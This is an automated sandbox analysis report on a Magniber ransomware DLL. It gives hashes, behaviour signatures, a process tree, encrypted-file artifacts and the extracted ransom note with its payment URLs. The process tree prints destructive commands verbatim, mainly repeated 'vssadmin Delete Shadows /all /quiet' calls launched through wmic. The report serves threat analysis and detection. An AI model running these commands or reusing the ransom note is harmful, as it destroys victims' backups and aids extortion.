Analysis

  • max time kernel
    144s
  • max time network
    183s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    30-11-2022 10:55

General

  • Target

    0362769fcb15c6e11528373bb98a572e.dll

  • Size

    42KB

  • MD5

    0362769fcb15c6e11528373bb98a572e

  • SHA1

    62f14e27becef8c7c889e5083c0341992e4bd57b

  • SHA256

    3aec49fb761581a0b95e23b1a85b8594308491968d42d04831ae01f8949b05b4

  • SHA512

    e6d739263194c61f73fc56127317e58e43caefce11294d8f0462d3891fdc142179d84844350536648d0ecde58253f64c26c017755f0a60eb79d6dbe7b07434e1

  • SSDEEP

    768:MeEfWZ7x3IEnQL31NFCZQzjHfywPvMeWQGMdUU/YUze//Ywu+k:MeEfWxmCQLI+zjHKKvMMqvUzenYwzk

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://02bc488022xdbbxfvjy.hjew6l4r3hpgj7qiloum5j7jwq7q3623v4fsbq5edbckeppeetpiihid.onion/xdbbxfvjy Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://02bc488022xdbbxfvjy.gunfail.quest/xdbbxfvjy http://02bc488022xdbbxfvjy.raredoe.uno/xdbbxfvjy http://02bc488022xdbbxfvjy.gaplies.fit/xdbbxfvjy http://02bc488022xdbbxfvjy.ranmuch.space/xdbbxfvjy Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://02bc488022xdbbxfvjy.hjew6l4r3hpgj7qiloum5j7jwq7q3623v4fsbq5edbckeppeetpiihid.onion/xdbbxfvjy

http://02bc488022xdbbxfvjy.gunfail.quest/xdbbxfvjy

http://02bc488022xdbbxfvjy.raredoe.uno/xdbbxfvjy

http://02bc488022xdbbxfvjy.gaplies.fit/xdbbxfvjy

http://02bc488022xdbbxfvjy.ranmuch.space/xdbbxfvjy

Signatures

  • Detect magniber ransomware 2 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 12 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 8 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1124
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:756
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://02bc488022xdbbxfvjy.gunfail.quest/xdbbxfvjy^&1^&45385968^&83^&284^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1952
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://02bc488022xdbbxfvjy.gunfail.quest/xdbbxfvjy&1&45385968&83&284&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1760
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1760 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2192
    • C:\Windows\system32\wbem\wmic.exe
      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1988
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:836
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1780
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:1280
    • C:\Windows\system32\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\0362769fcb15c6e11528373bb98a572e.dll,#1
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1980
      • C:\Windows\system32\wbem\wmic.exe
        C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
          PID:2568
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2592
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            4⤵
              PID:2700
        • C:\Windows\system32\wbem\wmic.exe
          C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
          2⤵
            PID:1256
          • C:\Windows\system32\cmd.exe
            cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1836
        • C:\Windows\system32\Dwm.exe
          "C:\Windows\system32\Dwm.exe"
          1⤵
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:1204
          • C:\Windows\system32\wbem\wmic.exe
            C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
            2⤵
              PID:2580
            • C:\Windows\system32\cmd.exe
              cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2604
              • C:\Windows\system32\wbem\WMIC.exe
                C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                3⤵
                  PID:2688
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2032
            • C:\Windows\system32\cmd.exe
              cmd /c CompMgmtLauncher.exe
              1⤵
              • Process spawned unexpected child process
              • Suspicious use of WriteProcessMemory
              PID:1940
              • C:\Windows\system32\CompMgmtLauncher.exe
                CompMgmtLauncher.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1172
                • C:\Windows\system32\wbem\wmic.exe
                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                  3⤵
                    PID:584
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                  PID:1324
                • C:\Windows\system32\wbem\WMIC.exe
                  C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                  1⤵
                    PID:840
                  • C:\Windows\system32\cmd.exe
                    cmd /c CompMgmtLauncher.exe
                    1⤵
                    • Process spawned unexpected child process
                    • Suspicious use of WriteProcessMemory
                    PID:2104
                    • C:\Windows\system32\CompMgmtLauncher.exe
                      CompMgmtLauncher.exe
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2160
                      • C:\Windows\system32\wbem\wmic.exe
                        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                        3⤵
                          PID:2288
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:2080
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:2260
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:2380
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:2808
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin.exe Delete Shadows /all /quiet
                      1⤵
                      • Process spawned unexpected child process
                      • Interacts with shadow copies
                      PID:2848
                    • C:\Windows\system32\cmd.exe
                      cmd /c CompMgmtLauncher.exe
                      1⤵
                      • Process spawned unexpected child process
                      PID:2836
                      • C:\Windows\system32\CompMgmtLauncher.exe
                        CompMgmtLauncher.exe
                        2⤵
                          PID:2940
                          • C:\Windows\system32\wbem\wmic.exe
                            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                            3⤵
                              PID:3028
                        • C:\Windows\system32\cmd.exe
                          cmd /c CompMgmtLauncher.exe
                          1⤵
                          • Process spawned unexpected child process
                          • Suspicious use of WriteProcessMemory
                          PID:2800
                          • C:\Windows\system32\CompMgmtLauncher.exe
                            CompMgmtLauncher.exe
                            2⤵
                              PID:2916
                              • C:\Windows\system32\wbem\wmic.exe
                                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                3⤵
                                  PID:3068
                            • C:\Windows\system32\vssadmin.exe
                              vssadmin.exe Delete Shadows /all /quiet
                              1⤵
                              • Process spawned unexpected child process
                              • Interacts with shadow copies
                              PID:1320
                            • C:\Windows\system32\vssadmin.exe
                              vssadmin.exe Delete Shadows /all /quiet
                              1⤵
                              • Process spawned unexpected child process
                              • Interacts with shadow copies
                              PID:1444

                            Network

                            MITRE ATT&CK Enterprise v6

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4JHWH5IN.txt

                              Filesize

                              601B

                              MD5

                              117ff5640c25e16c4f7e1c3f6a720ad7

                              SHA1

                              e4a4479d93677619263e3754d97a45b1b8129851

                              SHA256

                              c3e00ca7518cb2ef388df3c0ad9aff957e917f6d9adb11b59cd1890604a3c41e

                              SHA512

                              c842c8918c3396fe3f632126a3d4b2065a36b15e6d27266c1c3c307f5350864a06755a9c02401aa93c7ea3bbdcfe3ab02b075e53e880bfef68d750a7d3bca0aa

                            • C:\Users\Admin\Desktop\CheckpointResume.dxf.xdbbxfvjy

                              Filesize

                              296KB

                              MD5

                              097f12cd53b5d6933217d463e7b6c7f5

                              SHA1

                              ef51c12e0ac20e1a41a37ef35104e32636522036

                              SHA256

                              4d101774c2a7e6f0431bb74d25d0226eee4a9b2d93660534b1fb8fb9723a7dda

                              SHA512

                              0ebb9e9523fbff6eb82f7093917a544c7a7d83cea1c3578e63faf5e821d5c0adb2ec0e86b66fcabe0f98914960740cf2dbe881f6fac8d2feddc82b5883105f90

                            • C:\Users\Admin\Desktop\ExitNew.js.xdbbxfvjy

                              Filesize

                              254KB

                              MD5

                              c8a9cced6e8949b96701f1d87f0f65f0

                              SHA1

                              3924bdbc2d1110f8a8630ff2dc088f697286f1d3

                              SHA256

                              692fe572d57799e96fd3980e60cbaa4f943d67b7ed2aa63fd235e54932a91a33

                              SHA512

                              ea653663477aa1662ef848a1230b8b9e858b3ef979277a39173eeb60737a3b1233cb8dd9ef69a4b7e19a34dfced813ecc2ced13e0eeb2b8cc62f17921c9a99a5

                            • C:\Users\Admin\Desktop\ImportClear.jfif.xdbbxfvjy

                              Filesize

                              486KB

                              MD5

                              9c305ff5908fc309bbe88193b45ba218

                              SHA1

                              ce94239e735ecbefe337adbcce2dbe91605f048e

                              SHA256

                              2c206b605c88c1eb0178d1e8e51323dc5a21f406a18f2f59a741170b4c86b78c

                              SHA512

                              4061c839c9081f00914736897399c2bed66fbd6c779379e6fde37b454cf5bd197b093f9a31e61e6a1ef7e68ecf7dc1184818d812788101e438ad5143c0f1cb35

                            • C:\Users\Admin\Desktop\ReadDismount.xlsx.xdbbxfvjy

                              Filesize

                              423KB

                              MD5

                              0dca0dad5455110f1fb30a1063125896

                              SHA1

                              101004663bb7579d60a11e5f4b2f76c520a928ec

                              SHA256

                              892fa71d554da81a82748a2296fa9352c244062df117d49689f68a329ce76cad

                              SHA512

                              82c408170f0bf8642071a0cb8111e1053795f797d7c7d5eebc2b74b15b4447905845f2d6a36d15a5a1e1259e7971fbc9e2054eb2cd0820978704c828a0861161

                            • C:\Users\Admin\Desktop\RemoveGet.tiff.xdbbxfvjy

                              Filesize

                              592KB

                              MD5

                              982eef4e94e038d25cf93fd59e2b5cd6

                              SHA1

                              7c978cf8deaea6eb365176758757c17cdf55aa7d

                              SHA256

                              c9c7095e7fbbd192eabb5cf892469dcb5c08008125b291a909c3687e615d0e1d

                              SHA512

                              8cb2e122237ddfecdc79bac6a0ce6f1fa16f192a6c86e7540b1f12d33fada15a130ef27ba9be7af566ee25a96242869a2bf13e1d261ae4a94de774abea4bf129

                            • C:\Users\Admin\Desktop\RenameInstall.emf.xdbbxfvjy

                              Filesize

                              550KB

                              MD5

                              f2cd9e70654e806c749f9032325e3da0

                              SHA1

                              758c24666f3a9c2d17156cb8fd996dbb5f0e9056

                              SHA256

                              869df5b332de7f3dc4c6ea269a89b086cbbc8ec59cf104a457d9cb633f150a1d

                              SHA512

                              7220df10896c12ac1c536fce77f5e1a18167f34ccf1898a01cb7c8c3eabdd38e6fefde2adb510b5e0444a66e4f0fad91879d5a4c53b22a00342f84659212207d

                            • C:\Users\Admin\Desktop\RenameUse.bmp.xdbbxfvjy

                              Filesize

                              444KB

                              MD5

                              a6acdf43e304d4bfac93643942d7476a

                              SHA1

                              6505fa8fa7cd5175a23faeec366e822a4a979473

                              SHA256

                              3e6687a9f42bf69664abda6074f6e19cb32f5fbb694b17494551b0530991ea11

                              SHA512

                              beef8800f312015d431055ee88a45ce03479e174782f675f98a6c4e7ca8aae7ced01c47cddbcfc608690905017adf75deb1c6b8ef6fed8758afb556241aca7a8

                            • C:\Users\Admin\Desktop\UnblockClose.odp.xdbbxfvjy

                              Filesize

                              317KB

                              MD5

                              a3708c70a9836319299f3b98d5ecfda7

                              SHA1

                              c4a5807ee2f1a10cae95e991c5d9af7252ec9d7f

                              SHA256

                              613892f8e68f9006f852a0dfbf8269dc04a689f534438003fbc06217d5bfdc1c

                              SHA512

                              c633e7f404495d62b41e3ec149fd894721a2633fd179e63b8e6ab3aac8fb7980c1d4e7d0c2f4f6f3b256b97d026ed82d501d6814fd090a70f188ee05f4685b66

                            • C:\Users\Admin\Desktop\readme.txt

                              Filesize

                              1KB

                              MD5

                              3c734300847854c64be9decf8d1e088e

                              SHA1

                              306e8ccbed03800ad1db14123fa513d7ab7a2b37

                              SHA256

                              bbc56ddafc3b7d83f7f76aabf985febb983deed05acfd6eea07c4c996890c604

                              SHA512

                              cd2d4663b5974763fdfc2a679604810ba92f3f8b2f08a654ada5ea1898c716172b67874093192cf7534cd38a01e48cf8d540eb6779df5befeb983ddf706d56e1

                            • C:\Users\Admin\Desktop\readme.txt

                              Filesize

                              1KB

                              MD5

                              3c734300847854c64be9decf8d1e088e

                              SHA1

                              306e8ccbed03800ad1db14123fa513d7ab7a2b37

                              SHA256

                              bbc56ddafc3b7d83f7f76aabf985febb983deed05acfd6eea07c4c996890c604

                              SHA512

                              cd2d4663b5974763fdfc2a679604810ba92f3f8b2f08a654ada5ea1898c716172b67874093192cf7534cd38a01e48cf8d540eb6779df5befeb983ddf706d56e1

                            • C:\Users\Public\readme.txt

                              Filesize

                              1KB

                              MD5

                              3c734300847854c64be9decf8d1e088e

                              SHA1

                              306e8ccbed03800ad1db14123fa513d7ab7a2b37

                              SHA256

                              bbc56ddafc3b7d83f7f76aabf985febb983deed05acfd6eea07c4c996890c604

                              SHA512

                              cd2d4663b5974763fdfc2a679604810ba92f3f8b2f08a654ada5ea1898c716172b67874093192cf7534cd38a01e48cf8d540eb6779df5befeb983ddf706d56e1

                            • memory/756-64-0x000007FEFB771000-0x000007FEFB773000-memory.dmp

                              Filesize

                              8KB

                            • memory/1124-55-0x00000000001D0000-0x00000000001D5000-memory.dmp

                              Filesize

                              20KB

                            • memory/1980-54-0x0000000000090000-0x0000000000095000-memory.dmp

                              Filesize

                              20KB